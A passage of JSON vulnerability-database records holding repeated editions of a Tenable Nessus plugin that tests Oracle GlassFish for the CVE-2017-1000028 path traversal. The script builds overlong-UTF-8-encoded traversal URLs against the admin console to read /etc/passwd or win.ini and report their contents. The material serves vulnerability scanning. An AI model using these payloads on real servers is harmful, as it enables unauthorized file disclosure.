"2018-06-14T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=110192", "reporter": "Tenable", "references": ["http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2019-01-16T20:35:30", "history": [], "viewCount": 61, "enchantments": {"dependencies": {"modified": "2019-01-16T20:35:30", "references": [{"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}]}, "score": {"modified": "2019-01-16T20:35:30", "value": 5.0, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2019-01-16T20:35:30", "differentElements": ["cvss", "cvss3", "href", "modified", "reporter"], "edition": 1}, {"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "55af9630950fc92cc5dbef23d81a2fa41f814ac00be303a744e0fe6330867eac", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2020-04-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2020-04-01T00:27:33", "history": [], "viewCount": 125, "enchantments": {"dependencies": {"modified": "2020-04-01T00:27:33", "references": [{"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2020-04-01T00:27:33", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-04-01T00:27:33", "differentElements": ["modified"], "edition": 2}, {"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "2752939603e3ef7de5a581491915cf34163601c646d201151b2d9cc65f6a8899", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-01-01T03:03:30", "history": [], "viewCount": 137, "enchantments": {"dependencies": {"modified": "2021-01-01T03:03:30", "references": [{"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2021-01-01T03:03:30", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-01-01T03:03:30", "differentElements": ["modified"], "edition": 3}, {"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "fe12f9b912190b457e723707f33eb056ce3a6a390eae7e44f59ae804212944d6", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2021-07-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-07-02T00:39:56", "history": [], "viewCount": 142, "enchantments": {"dependencies": {"modified": "2021-07-02T00:39:56", "references": [{"idList": ["UB:CVE-2017-1000028"], "type": "ubuntucve"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2021-07-02T00:39:56", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = 